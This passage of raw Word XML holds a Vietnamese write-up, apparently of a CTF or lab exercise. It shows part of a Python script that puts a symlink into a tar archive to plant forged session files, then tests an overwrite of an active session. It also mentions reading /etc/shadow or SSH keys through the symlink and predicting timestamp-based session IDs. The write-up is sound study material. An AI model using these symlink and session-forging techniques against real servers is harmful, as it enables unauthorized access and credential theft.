          <w:p w14:paraId="43471785" w14:textId="77777777" w:rsidR="00FC3232" w:rsidRPr="00FC3232" w:rsidRDefault="00FC3232" w:rsidP="00FC3232">
            <w:r w:rsidRPr="00FC3232">
              <w:t xml:space="preserve">    info.linkname = target_path</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="195E3298" w14:textId="77777777" w:rsidR="00FC3232" w:rsidRPr="00FC3232" w:rsidRDefault="00FC3232" w:rsidP="00FC3232">
            <w:r w:rsidRPr="00FC3232">
              <w:t xml:space="preserve">    tar.addfile(info)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4DC7AC90" w14:textId="77777777" w:rsidR="00FC3232" w:rsidRPr="00FC3232" w:rsidRDefault="00FC3232" w:rsidP="00FC3232"/>
          <w:p w14:paraId="0033E4C3" w14:textId="77777777" w:rsidR="00FC3232" w:rsidRPr="00FC3232" w:rsidRDefault="00FC3232" w:rsidP="00FC3232">
            <w:r w:rsidRPr="00FC3232">
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:r w:rsidRPr="00FC3232">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t># Gắn file giả vào symlink</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="61DBB526" w14:textId="77777777" w:rsidR="00FC3232" w:rsidRPr="00FC3232" w:rsidRDefault="00FC3232" w:rsidP="00FC3232">
            <w:r w:rsidRPr="00FC3232">
              <w:t xml:space="preserve">    tar.add(</w:t>
            </w:r>
            <w:r w:rsidRPr="00FC3232">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>"fake_session.json"</w:t>
            </w:r>
            <w:r w:rsidRPr="00FC3232">
              <w:t>, arcname=symlink_name)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="44C1685E" w14:textId="77777777" w:rsidR="00FC3232" w:rsidRPr="00FC3232" w:rsidRDefault="00FC3232" w:rsidP="00FC3232"/>
          <w:p w14:paraId="4ACDC626" w14:textId="77777777" w:rsidR="00FC3232" w:rsidRPr="00FC3232" w:rsidRDefault="00FC3232" w:rsidP="00FC3232">
            <w:r w:rsidRPr="00FC3232">
              <w:t>print(</w:t>
            </w:r>
            <w:r w:rsidRPr="00FC3232">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>"</w:t>
            </w:r>
            <w:r w:rsidRPr="00FC3232">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>✅</w:t>
            </w:r>
            <w:r w:rsidRPr="00FC3232">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t xml:space="preserve"> File exploit.tar đã tạo xong!"</w:t>
            </w:r>
            <w:r w:rsidRPr="00FC3232">
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="480BF6A7" w14:textId="77777777" w:rsidR="0007566C" w:rsidRDefault="0007566C" w:rsidP="00FC0750">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7DB23E17" w14:textId="2C2E1C9C" w:rsidR="00ED2E49" w:rsidRDefault="00ED2E49" w:rsidP="00FC0750">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Thực hiện chạy script:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78ED691F" w14:textId="11DD567A" w:rsidR="00A503D6" w:rsidRDefault="00DE27D3" w:rsidP="00FC0750">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00DE27D3">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="734B4C4D" wp14:editId="4B1124F5">
            <wp:extent cx="5731510" cy="657225"/>
            <wp:effectExtent l="0" t="0" r="2540" b="9525"/>
            <wp:docPr id="4693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647" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId29"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="657225"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="48277C5B" w14:textId="66580C77" w:rsidR="00D57260" w:rsidRPr="001107B8" w:rsidRDefault="00D57260" w:rsidP="00FC0750">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Gửi file nén đã tạo:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B7E067B" w14:textId="49726D82" w:rsidR="001107B8" w:rsidRDefault="00CF4C40" w:rsidP="00FC0750">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00CF4C40">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="45DFE646" wp14:editId="652DC6CC">
            <wp:extent cx="5731510" cy="3406140"/>
            <wp:effectExtent l="0" t="0" r="2540" b="3810"/>
            <wp:docPr id="8508050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05083" name="Picture 1" descr="A screenshot of a computer screen&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId30"/>
                    <a:srcRect t="5700" b="14681"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="3406140"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="64F42E8C" w14:textId="77777777" w:rsidR="0091015C" w:rsidRDefault="0091015C" w:rsidP="00FC0750">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59F92B48" w14:textId="77777777" w:rsidR="0091015C" w:rsidRDefault="0091015C" w:rsidP="00FC0750">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="571D75D1" w14:textId="61997D9B" w:rsidR="00D57260" w:rsidRDefault="00D57260" w:rsidP="00FC0750">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Kiểm tra kết quả:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B97857F" w14:textId="2E749CC1" w:rsidR="00216F38" w:rsidRDefault="00400CE7" w:rsidP="00FC0750">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00400CE7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4AAE69A3" wp14:editId="79372EEC">
            <wp:extent cx="5731510" cy="947420"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5080"/>
            <wp:docPr id="8731106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1065" name="Picture 1" descr="A computer screen shot of white text&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId31"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="947420"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="062B528A" w14:textId="0BCA4D00" w:rsidR="00D57260" w:rsidRPr="00C15552" w:rsidRDefault="00D57260" w:rsidP="00FC0750">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00C15552">
        <w:t xml:space="preserve">Kết quả cho thấy rằng file giả mạo đã thành công vượt qua cơ chế bảo vệ của hệ thống </w:t>
      </w:r>
      <w:r w:rsidR="00C15552" w:rsidRPr="00C15552">
        <w:t>và được ghi vào trong thư mục chứa session:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="061357DE" w14:textId="779C33DE" w:rsidR="00770D2B" w:rsidRDefault="00770D2B" w:rsidP="00FC0750">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00770D2B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3E7EB84B" wp14:editId="6F0317EC">
            <wp:extent cx="5731510" cy="1075690"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1993610560"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0560" name="Picture 1" descr="A computer screen shot of white text&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId32"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1075690"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F206B75" w14:textId="4783EEF0" w:rsidR="00C15552" w:rsidRPr="000F1B6F" w:rsidRDefault="00C15552" w:rsidP="00FC0750">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="000F1B6F">
        <w:t xml:space="preserve">Bây giờ mình sẽ sửa session_id thành session_id đang được sử dụng của tài khoản mình </w:t>
      </w:r>
      <w:r w:rsidR="000F1B6F" w:rsidRPr="000F1B6F">
        <w:t>hiện tại</w:t>
      </w:r>
      <w:r w:rsidR="000F1B6F" w:rsidRPr="000F1B6F">
        <w:t xml:space="preserve"> để kiểm tra xem có thể ghi đè hay không:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5797C62F" w14:textId="77777777" w:rsidR="000F1B6F" w:rsidRDefault="00F05CD3" w:rsidP="00FC0750">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F05CD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3B1F9505" wp14:editId="1CE24256">
            <wp:extent cx="5731510" cy="3122295"/>
            <wp:effectExtent l="0" t="0" r="2540" b="1905"/>
            <wp:docPr id="158436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1583" name="Picture 1" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId33"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="3122295"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="00F05CD3">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C635EEF" w14:textId="77777777" w:rsidR="000F1B6F" w:rsidRDefault="000F1B6F" w:rsidP="00FC0750">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>Tạo file tar:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AEDFCDE" w14:textId="131BCBBA" w:rsidR="00770D2B" w:rsidRDefault="00F05CD3" w:rsidP="00FC0750">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F05CD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="73C902E2" wp14:editId="7497CF7F">
            <wp:extent cx="5731510" cy="796290"/>
            <wp:effectExtent l="0" t="0" r="2540" b="3810"/>
            <wp:docPr id="193585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51063" name="Picture 1" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId34"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="796290"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="68E26BF3" w14:textId="77777777" w:rsidR="0091015C" w:rsidRDefault="0091015C" w:rsidP="00FC0750">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="267A690D" w14:textId="77777777" w:rsidR="0091015C" w:rsidRDefault="0091015C" w:rsidP="00FC0750">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0DA5F97E" w14:textId="2394DEBC" w:rsidR="000F1B6F" w:rsidRDefault="000F1B6F" w:rsidP="00FC0750">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Sau khi gửi thì có 1 thông báo hiện lên rằng file đã tồn tại ở </w:t>
      </w:r>
      <w:r w:rsidR="005D50D0">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>thư</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> mục /files/</w:t>
      </w:r>
      <w:r w:rsidR="005D50D0">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">abcdef. Nhưng mà trước khi mình gửi file tar thì ở thư mục </w:t>
      </w:r>
      <w:r w:rsidR="005D50D0">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>files/abcdef</w:t>
      </w:r>
      <w:r w:rsidR="005D50D0">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> không có 1 file nào có tên như vậy. Vì vậy khả năng thông náo này là để chỉ rằng file đã tồn tại ở </w:t>
      </w:r>
      <w:r w:rsidR="0091015C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>/tmp/sessions/abcdef.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AB3F94C" w14:textId="35E4E587" w:rsidR="00734567" w:rsidRDefault="00734567" w:rsidP="00FC0750">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00734567">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="29463E8A" wp14:editId="717F9FE7">
            <wp:extent cx="5731510" cy="713105"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="410453469"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3469" name="Picture 1" descr="A black and white screen with white text&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId35"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="713105"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="24993416" w14:textId="715B87DA" w:rsidR="0091015C" w:rsidRPr="00681147" w:rsidRDefault="00681147" w:rsidP="00FC0750">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00681147">
        <w:t>Thực hiện đọc file session có id trùng với id được sử dụng để chèn:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62CA49C9" w14:textId="23D12429" w:rsidR="00F90A11" w:rsidRDefault="00986E89" w:rsidP="00FC0750">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00986E89">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="29651189" wp14:editId="5B142E8C">
            <wp:extent cx="5731510" cy="668020"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="7243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4928" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId36"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="668020"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="49A8B588" w14:textId="77777777" w:rsidR="001B7C9C" w:rsidRPr="00FC0750" w:rsidRDefault="00681147" w:rsidP="00FC0750">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC0750">
        <w:t xml:space="preserve">Phát hiện rằng file không bị sửa </w:t>
      </w:r>
      <w:r w:rsidR="001F0B83" w:rsidRPr="00FC0750">
        <w:t>đổi</w:t>
      </w:r>
      <w:r w:rsidR="001B7C9C" w:rsidRPr="00FC0750">
        <w:t xml:space="preserve"> từ đó xác định rằng </w:t>
      </w:r>
      <w:r w:rsidR="001B7C9C" w:rsidRPr="00FC0750">
        <w:t>Hệ thống hiện tại không bị khai thác ghi đè thông qua symlink injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BDC2B1A" w14:textId="0D02B467" w:rsidR="00681147" w:rsidRPr="00FC0750" w:rsidRDefault="00FC0750" w:rsidP="00FC0750">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC0750">
        <w:t>Kiểm tra vị trí /file/abcdef:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2278DBD6" w14:textId="1DE4D961" w:rsidR="00F90A11" w:rsidRDefault="00986E89">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00986E89">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6F741216" wp14:editId="607D9409">
            <wp:extent cx="5731510" cy="1059180"/>
            <wp:effectExtent l="0" t="0" r="2540" b="7620"/>
            <wp:docPr id="11252619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1956" name="Picture 1" descr="A screen shot of a computer code&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId37"/>
                    <a:srcRect t="6711"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1059180"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="216BA867" w14:textId="76015FC8" w:rsidR="00FC0750" w:rsidRDefault="00FC0750" w:rsidP="002662F2">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="002662F2">
        <w:t xml:space="preserve">Có thể thấy có 1 file tên session_id đã được tạo trong đây chứa thông tin file được symlink trỏ </w:t>
      </w:r>
      <w:r w:rsidR="00FB421F" w:rsidRPr="002662F2">
        <w:t xml:space="preserve">tới. Ở đây cũng chỉ ra có 1 cách khai thác khá hay trong trường hợp các file này có thể được đọc trên web. Đó là chúng ta có thể thực hiện đọc các file nhạy cảm như /etc/shadow hay là </w:t>
      </w:r>
      <w:r w:rsidR="002662F2" w:rsidRPr="002662F2">
        <w:t>/.ssh/authorized_keys</w:t>
      </w:r>
      <w:r w:rsidR="002662F2" w:rsidRPr="002662F2">
        <w:t xml:space="preserve"> để có thể truy cập bất hợp pháp vào shell. Tuy nhiên ở bài này thì điều đó là không </w:t>
      </w:r>
      <w:r w:rsidR="002662F2">
        <w:t>thể.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63245772" w14:textId="496C54FA" w:rsidR="002662F2" w:rsidRPr="002662F2" w:rsidRDefault="002662F2" w:rsidP="002662F2">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Và như đã nói ở phần review code, </w:t>
      </w:r>
      <w:r w:rsidR="00950027">
        <w:t>session_id được tạo trên dấu thời gian, bây giờ mình sẽ phân tích lại:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B4EEA51" w14:textId="7F4C64C1" w:rsidR="006F6D8E" w:rsidRDefault="006F6D8E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F6D8E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="30C235FA" wp14:editId="2858E4C0">
            <wp:extent cx="5731510" cy="1055370"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="113449284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92844" name="Picture 1" descr="A computer screen shot of text&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId38"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1055370"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="24764BDB" w14:textId="2121344B" w:rsidR="00552A66" w:rsidRDefault="00950027" w:rsidP="00F82712">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00F82712">
        <w:t xml:space="preserve">Hàm này sẽ </w:t>
      </w:r>
      <w:r w:rsidR="00552A66" w:rsidRPr="00552A66">
        <w:t>Lấy thời gian hiện tại dưới dạng Unix timestamp (số giây kể từ 1970-01-01)</w:t>
      </w:r>
      <w:r w:rsidRPr="00F82712">
        <w:t xml:space="preserve"> rồi t</w:t>
      </w:r>
      <w:r w:rsidR="00552A66" w:rsidRPr="00552A66">
        <w:t>ính toán SHA-256 hash của chuỗi thời gian.</w:t>
      </w:r>
      <w:r w:rsidR="007B58C4" w:rsidRPr="00F82712">
        <w:t xml:space="preserve"> Và sau đó sẽ tạo 1 </w:t>
      </w:r>
      <w:r w:rsidR="007B58C4" w:rsidRPr="00F82712">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="vi-VN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>chuỗi hexadecimal</w:t>
      </w:r>
      <w:r w:rsidR="007B58C4" w:rsidRPr="00F82712">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="vi-VN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> được </w:t>
      </w:r>
      <w:r w:rsidR="00F82712" w:rsidRPr="00F82712">
        <w:t>t</w:t>
      </w:r>
      <w:r w:rsidR="00552A66" w:rsidRPr="00552A66">
        <w:t xml:space="preserve">rả về </w:t>
      </w:r>
      <w:r w:rsidR="007B58C4" w:rsidRPr="00F82712">
        <w:t xml:space="preserve">từ </w:t>
      </w:r>
      <w:r w:rsidR="00552A66" w:rsidRPr="00552A66">
        <w:t>một mảng 32 byte</w:t>
      </w:r>
      <w:r w:rsidRPr="00F82712">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F82712" w:rsidRPr="00F82712">
        <w:t xml:space="preserve">từ kết quả </w:t>
      </w:r>
      <w:r w:rsidR="007B58C4" w:rsidRPr="00F82712">
        <w:t xml:space="preserve">sau khi </w:t>
      </w:r>
      <w:r w:rsidR="00F82712">
        <w:t>hash.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54356044" w14:textId="3708485C" w:rsidR="00F82712" w:rsidRPr="00F82712" w:rsidRDefault="00F82712" w:rsidP="00285BC9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="vi-VN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Vì vậy mình sẽ thực hiện tạo một session_id ở thời gian hiện tại +20s rồi chuyển về </w:t>
      </w:r>
      <w:r w:rsidR="00285BC9">
        <w:t xml:space="preserve">định </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">dạng tương </w:t>
      </w:r>
      <w:r w:rsidR="00A00B46">
        <w:t>tự. Sau đó mình sẽ tạo 1 file nén để thực hiện cơ chế symlink giúp tạo ra 1 file session trong vị trí lưu trữ của hệ thống. Và khi hệ thống tạo session tương tự, nó có thể thấy rằng file đã tồn tại và sử dụng luôn file mà mình đã tạo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2359F531" w14:textId="77777777" w:rsidR="00285BC9" w:rsidRDefault="00285BC9" w:rsidP="00DE5C79">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>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98"/>
        <w:gridCol w:w="8733"/>
      </w:tblGrid>
      <w:tr w:rsidR="00DE5C79" w:rsidRPr="00DE5C79" w14:paraId="1BD8135B" w14:textId="77777777" w:rsidTr="00C33316">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
